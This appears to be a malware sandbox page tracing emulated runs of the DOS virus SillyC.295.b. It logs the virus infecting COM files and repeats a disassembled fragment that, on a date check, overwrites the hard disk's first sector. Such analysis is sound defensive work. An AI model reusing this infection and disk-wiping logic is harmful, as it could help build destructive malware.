Sample viewer

vx.netlux.org/Virus.DOS.SillyC.295.b

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:03:04.074776733Z 42 PC: 12a45 | Get date 0x12a45: cmp dh, 3
0x12a48: jne 0x12a5d
0x12a4a: mov ah, 3
0x12a4c: mov dx, 0x80
0x12a4f: mov cx, 1
0x12a52: mov al, 1
0x12a54: push cs
0x12a55: pop es
0x12a56: mov bx, 0x11b
0x12a59: int 0x13
0x12a5b: int 0x18
0x12a5d: mov ah, 0x4a
0x12a5f: mov bx, word ptr cs:[0x200]
0x12a64: add bx, 0x20e
0x12a68: push cx
0x12a69: mov cl, 4
0x12a6b: shr bx, cl
0x12a6d: inc bx
0x12a6e: pop cx
0x12a6f: int 0x21
2018-12-17T23:03:04.079198983Z 74 PC: 12a71 | Reallocate memory
2018-12-17T23:03:04.080548322Z 72 PC: 12a79 | Allocate memory
2018-12-17T23:03:04.082024174Z 47 PC: 12a7f | Get disk transfer address
2018-12-17T23:03:04.084165952Z 26 PC: 12a8c | Set disk transfer address
2018-12-17T23:03:04.085644781Z 78 PC: 12a98 | Find first file
2018-12-17T23:03:04.091639795Z 67 PC: 12ad4 | Get or set file attributes
2018-12-17T23:03:04.109089027Z 61 PC: 12ad9 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:03:04.115506017Z 63 PC: 12ae7 | Read file or device (Read 295 bytes on handle 5)
2018-12-17T23:03:04.12183062Z 66 PC: 12af0 | Move file pointer
2018-12-17T23:03:04.123481444Z 64 PC: 12afc | Write file or device (Write 295 bytes on handle 5)
2018-12-17T23:03:04.126711602Z 66 PC: 12b0a | Move file pointer
2018-12-17T23:03:04.128140993Z 64 PC: 12b11 | Write file or device (Write 295 bytes on handle 5)
2018-12-17T23:03:04.135673445Z 87 PC: 12b1c | Get or set file date and time
2018-12-17T23:03:04.137770002Z 62 PC: 12b20 | Close file
2018-12-17T23:03:04.143262909Z 79 PC: 12b28 | Find next file
2018-12-17T23:03:04.145152955Z 79 PC: 12b28 | Find next file
2018-12-17T23:03:04.148188456Z 79 PC: 12b28 | Find next file
2018-12-17T23:03:04.151671434Z 79 PC: 12b28 | Find next file
2018-12-17T23:03:04.154297696Z 79 PC: 12b28 | Find next file
2018-12-17T23:03:04.158813487Z 67 PC: 12ad4 | Get or set file attributes
2018-12-17T23:03:04.168589894Z 61 PC: 12ad9 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:03:04.174821014Z 63 PC: 12ae7 | Read file or device (Read 295 bytes on handle 5)
2018-12-17T23:03:04.18164988Z 66 PC: 12af0 | Move file pointer
2018-12-17T23:03:04.183269736Z 64 PC: 12afc | Write file or device (Write 295 bytes on handle 5)
2018-12-17T23:03:04.185936073Z 66 PC: 12b0a | Move file pointer
2018-12-17T23:03:04.187921236Z 64 PC: 12b11 | Write file or device (Write 295 bytes on handle 5)
2018-12-17T23:03:04.195697395Z 87 PC: 12b1c | Get or set file date and time
2018-12-17T23:03:04.197536079Z 62 PC: 12b20 | Close file
2018-12-17T23:03:04.205493999Z 79 PC: 12b28 | Find next file
2018-12-17T23:03:04.208146674Z 79 PC: 12b28 | Find next file
2018-12-17T23:03:04.210658059Z 67 PC: 12ad4 | Get or set file attributes
2018-12-17T23:03:04.220423889Z 61 PC: 12ad9 | Open file (Filename = 'TEST.COM')
2018-12-17T23:03:04.227898591Z 63 PC: 12ae7 | Read file or device (Read 295 bytes on handle 5)
2018-12-17T23:03:04.230631506Z 66 PC: 12af0 | Move file pointer
2018-12-17T23:03:04.232195148Z 64 PC: 12afc | Write file or device (Write 295 bytes on handle 5)
2018-12-17T23:03:04.235329476Z 66 PC: 12b0a | Move file pointer
2018-12-17T23:03:04.236930939Z 64 PC: 12b11 | Write file or device (Write 295 bytes on handle 5)
2018-12-17T23:03:04.244822082Z 87 PC: 12b1c | Get or set file date and time
2018-12-17T23:03:04.247097634Z 62 PC: 12b20 | Close file
2018-12-17T23:03:04.254782715Z 79 PC: 12b28 | Find next file
2018-12-17T23:03:04.2573264Z 26 PC: 12b32 | Set disk transfer address
2018-12-17T23:03:04.259496289Z 73 PC: 133bd | Release memory
2018-12-17T23:03:04.262837379Z 77 PC: 11fe0 | Get program return code
2018-12-17T23:03:04.264170121Z 72 PC: 12174 | Allocate memory
2018-12-17T23:03:04.266756722Z 72 PC: 1218d | Allocate memory
2018-12-17T23:03:04.268557954Z 2 PC: 1268d | Character output (Char = '0d')
2018-12-17T23:03:04.270488388Z 2 PC: 1268d | Character output (Char = '0a')
2018-12-17T23:03:04.274951821Z 2 PC: 1268d | Character output (Char = '4d')
2018-12-17T23:03:04.277056975Z 2 PC: 1268d | Character output (Char = '65')
2018-12-17T23:03:04.279531061Z 2 PC: 1268d | Character output (Char = '6d')
2018-12-17T23:03:04.293917442Z 2 PC: 1268d | Character output (Char = '6f')
2018-12-17T23:03:04.295918738Z 2 PC: 1268d | Character output (Char = '72')
2018-12-17T23:03:04.298148977Z 2 PC: 1268d | Character output (Char = '79')
2018-12-17T23:03:04.301639838Z 2 PC: 1268d | Character output (Char = '20')
2018-12-17T23:03:04.303751951Z 2 PC: 1268d | Character output (Char = '61')
2018-12-17T23:03:04.305738567Z 2 PC: 1268d | Character output (Char = '6c')
2018-12-17T23:03:04.308881064Z 2 PC: 1268d | Character output (Char = '6c')
2018-12-17T23:03:04.312072463Z 2 PC: 1268d | Character output (Char = '6f')
2018-12-17T23:03:04.314275949Z 2 PC: 1268d | Character output (Char = '63')
2018-12-17T23:03:04.317257114Z 2 PC: 1268d | Character output (Char = '61')
2018-12-17T23:03:04.318863163Z 2 PC: 1268d | Character output (Char = '74')
2018-12-17T23:03:04.32039303Z 2 PC: 1268d | Character output (Char = '69')
2018-12-17T23:03:04.322557171Z 2 PC: 1268d | Character output (Char = '6f')
2018-12-17T23:03:04.324277302Z 2 PC: 1268d | Character output (Char = '6e')
2018-12-17T23:03:04.325753867Z 2 PC: 1268d | Character output (Char = '20')
2018-12-17T23:03:04.327779068Z 2 PC: 1268d | Character output (Char = '65')
2018-12-17T23:03:04.329393103Z 2 PC: 1268d | Character output (Char = '72')
2018-12-17T23:03:04.331008151Z 2 PC: 1268d | Character output (Char = '72')
2018-12-17T23:03:04.333249021Z 2 PC: 1268d | Character output (Char = '6f')
2018-12-17T23:03:04.334809291Z 2 PC: 1268d | Character output (Char = '72')
2018-12-17T23:03:04.336271487Z 2 PC: 1268d | Character output (Char = '0d')
2018-12-17T23:03:04.338350421Z 2 PC: 1268d | Character output (Char = '0a')
2018-12-17T23:03:04.340484498Z 2 PC: 1268d | Character output (Char = '43')
2018-12-17T23:03:04.341853407Z 2 PC: 1268d | Character output (Char = '61')
2018-12-17T23:03:04.343840167Z 2 PC: 1268d | Character output (Char = '6e')
2018-12-17T23:03:04.345253171Z 2 PC: 1268d | Character output (Char = '6e')
2018-12-17T23:03:04.347336089Z 2 PC: 1268d | Character output (Char = '6f')
2018-12-17T23:03:04.355977383Z 2 PC: 1268d | Character output (Char = '74')
2018-12-17T23:03:04.358005639Z 2 PC: 1268d | Character output (Char = '20')
2018-12-17T23:03:04.359739065Z 2 PC: 1268d | Character output (Char = '6c')
2018-12-17T23:03:04.361619765Z 2 PC: 1268d | Character output (Char = '6f')
2018-12-17T23:03:04.362969031Z 2 PC: 1268d | Character output (Char = '61')
2018-12-17T23:03:04.364935349Z 2 PC: 1268d | Character output (Char = '64')
2018-12-17T23:03:04.367292273Z 2 PC: 1268d | Character output (Char = '20')
2018-12-17T23:03:04.369210208Z 2 PC: 1268d | Character output (Char = '43')
2018-12-17T23:03:04.371062045Z 2 PC: 1268d | Character output (Char = '4f')
2018-12-17T23:03:04.373311412Z 2 PC: 1268d | Character output (Char = '4d')
2018-12-17T23:03:04.375222367Z 2 PC: 1268d | Character output (Char = '4d')
2018-12-17T23:03:04.377077048Z 2 PC: 1268d | Character output (Char = '41')
2018-12-17T23:03:04.379573179Z 2 PC: 1268d | Character output (Char = '4e')
2018-12-17T23:03:04.381545575Z 2 PC: 1268d | Character output (Char = '44')
2018-12-17T23:03:04.383418906Z 2 PC: 1268d | Character output (Char = '2c')
2018-12-17T23:03:04.385839832Z 2 PC: 1268d | Character output (Char = '20')
2018-12-17T23:03:04.387759458Z 2 PC: 1268d | Character output (Char = '73')
2018-12-17T23:03:04.389621735Z 2 PC: 1268d | Character output (Char = '79')
2018-12-17T23:03:04.39215726Z 2 PC: 1268d | Character output (Char = '73')
2018-12-17T23:03:04.394131115Z 2 PC: 1268d | Character output (Char = '74')
2018-12-17T23:03:04.39685086Z 2 PC: 1268d | Character output (Char = '65')
2018-12-17T23:03:04.399510989Z 2 PC: 1268d | Character output (Char = '6d')
2018-12-17T23:03:04.401849701Z 2 PC: 1268d | Character output (Char = '20')
2018-12-17T23:03:04.403722905Z 2 PC: 1268d | Character output (Char = '68')
2018-12-17T23:03:04.406709439Z 2 PC: 1268d | Character output (Char = '61')
2018-12-17T23:03:04.410444801Z 2 PC: 1268d | Character output (Char = '6c')
2018-12-17T23:03:04.412810852Z 2 PC: 1268d | Character output (Char = '74')
2018-12-17T23:03:04.416397514Z 2 PC: 1268d | Character output (Char = '65')
2018-12-17T23:03:04.418570399Z 2 PC: 1268d | Character output (Char = '64')
2018-12-17T23:03:04.420742125Z 2 PC: 1268d | Character output (Char = '0d')
2018-12-17T23:03:04.423489832Z 2 PC: 1268d | Character output (Char = '0a')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14427,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:40:41.280749477Z 42 PC: 12a45 | Get date 0x12a45: cmp dh, 3
0x12a48: jne 0x12a5d
0x12a4a: mov ah, 3
0x12a4c: mov dx, 0x80
0x12a4f: mov cx, 1
0x12a52: mov al, 1
0x12a54: push cs
0x12a55: pop es
0x12a56: mov bx, 0x11b
0x12a59: int 0x13
0x12a5b: int 0x18
0x12a5d: mov ah, 0x4a
0x12a5f: mov bx, word ptr cs:[0x200]
0x12a64: add bx, 0x20e
0x12a68: push cx
0x12a69: mov cl, 4
0x12a6b: shr bx, cl
0x12a6d: inc bx
0x12a6e: pop cx
0x12a6f: int 0x21
2018-12-25T12:40:41.283566994Z 74 PC: 12a71 | Reallocate memory
2018-12-25T12:40:41.284906151Z 72 PC: 12a79 | Allocate memory
2018-12-25T12:40:41.286377472Z 47 PC: 12a7f | Get disk transfer address
2018-12-25T12:40:41.287951228Z 26 PC: 12a8c | Set disk transfer address
2018-12-25T12:40:41.288973257Z 78 PC: 12a98 | Find first file
2018-12-25T12:40:41.294654762Z 67 PC: 12ad4 | Get or set file attributes
2018-12-25T12:40:41.313016181Z 61 PC: 12ad9 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:40:41.319640644Z 63 PC: 12ae7 | Read file or device (Read 295 bytes on handle 5)
2018-12-25T12:40:41.325968728Z 66 PC: 12af0 | Move file pointer
2018-12-25T12:40:41.328287164Z 64 PC: 12afc | Write file or device (Write 295 bytes on handle 5)
2018-12-25T12:40:41.330886365Z 66 PC: 12b0a | Move file pointer
2018-12-25T12:40:41.332304934Z 64 PC: 12b11 | Write file or device (Write 295 bytes on handle 5)
2018-12-25T12:40:41.340908334Z 87 PC: 12b1c | Get or set file date and time
2018-12-25T12:40:41.342346786Z 62 PC: 12b20 | Close file
2018-12-25T12:40:41.350326411Z 79 PC: 12b28 | Find next file
2018-12-25T12:40:41.353316231Z 79 PC: 12b28 | Find next file (See above)
2018-12-25T12:40:41.356073403Z 79 PC: 12b28 | Find next file (See above)
2018-12-25T12:40:41.358456863Z 79 PC: 12b28 | Find next file (See above)
2018-12-25T12:40:41.360794484Z 79 PC: 12b28 | Find next file (See above)
2018-12-25T12:40:41.364059499Z 67 PC: 12ad4 | Get or set file attributes (See above)
2018-12-25T12:40:41.37469724Z 61 PC: 12ad9 | Open file (See above)
2018-12-25T12:40:41.388852558Z 63 PC: 12ae7 | Read file or device (See above)
2018-12-25T12:40:41.414843354Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:40:41.416523387Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:40:41.419582174Z 66 PC: 12b0a | Move file pointer (See above)
2018-12-25T12:40:41.422109659Z 64 PC: 12b11 | Write file or device (See above)
2018-12-25T12:40:41.430359231Z 87 PC: 12b1c | Get or set file date and time (See above)
2018-12-25T12:40:41.432220064Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:40:41.440911695Z 79 PC: 12b28 | Find next file (See above)
2018-12-25T12:40:41.443812592Z 79 PC: 12b28 | Find next file (See above)
2018-12-25T12:40:41.4465949Z 67 PC: 12ad4 | Get or set file attributes (See above)
2018-12-25T12:40:41.456797524Z 61 PC: 12ad9 | Open file (See above)
2018-12-25T12:40:41.463374953Z 63 PC: 12ae7 | Read file or device (See above)
2018-12-25T12:40:41.466173011Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:40:41.468674186Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:40:41.47184093Z 66 PC: 12b0a | Move file pointer (See above)
2018-12-25T12:40:41.473466282Z 64 PC: 12b11 | Write file or device (See above)
2018-12-25T12:40:41.482548859Z 87 PC: 12b1c | Get or set file date and time (See above)
2018-12-25T12:40:41.484306976Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:40:41.492263296Z 79 PC: 12b28 | Find next file (See above)
2018-12-25T12:40:41.494836123Z 26 PC: 12b32 | Set disk transfer address
2018-12-25T12:40:41.496823944Z 73 PC: 133bd | Release memory
2018-12-25T12:40:41.500172927Z 77 PC: 11fe0 | Get program return code
2018-12-25T12:40:41.501542901Z 72 PC: 12174 | Allocate memory
2018-12-25T12:40:41.505149535Z 72 PC: 1218d | Allocate memory
2018-12-25T12:40:41.507483026Z 2 PC: 1268d | Character output (Char = '0d')
2018-12-25T12:40:41.509349751Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.521807726Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.524051723Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.526405213Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.529542071Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.531830649Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.534066363Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.536891176Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.539686028Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.541843758Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.545417347Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.547657251Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.54992271Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.566443882Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.568578362Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.570659246Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.573734139Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.575751297Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.577727082Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.580764063Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.583242869Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.585563989Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.592941208Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.595004177Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.597436498Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.600339346Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.603907734Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.605949027Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.608726426Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.611953372Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.613932477Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.617544435Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.619757428Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.621773662Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.625510654Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.628969651Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.631044067Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.634158947Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.636654712Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.638879575Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.64157796Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.643830038Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.652690107Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.655798174Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.657881279Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.659934884Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.662166044Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.664824567Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.666812672Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.668858672Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.671729017Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.673689871Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.67577299Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.678683181Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.68072769Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.682748225Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.685990218Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.687976031Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.690789948Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.694076039Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.696455043Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.69868504Z 2 PC: 1268d | Character output (See above)

{"DateBased":true,"Day":1,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14427,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:40:42.240010272Z 42 PC: 12a45 | Get date 0x12a45: cmp dh, 3
0x12a48: jne 0x12a5d
0x12a4a: mov ah, 3
0x12a4c: mov dx, 0x80
0x12a4f: mov cx, 1
0x12a52: mov al, 1
0x12a54: push cs
0x12a55: pop es
0x12a56: mov bx, 0x11b
0x12a59: int 0x13
0x12a5b: int 0x18
0x12a5d: mov ah, 0x4a
0x12a5f: mov bx, word ptr cs:[0x200]
0x12a64: add bx, 0x20e
0x12a68: push cx
0x12a69: mov cl, 4
0x12a6b: shr bx, cl
0x12a6d: inc bx
0x12a6e: pop cx
0x12a6f: int 0x21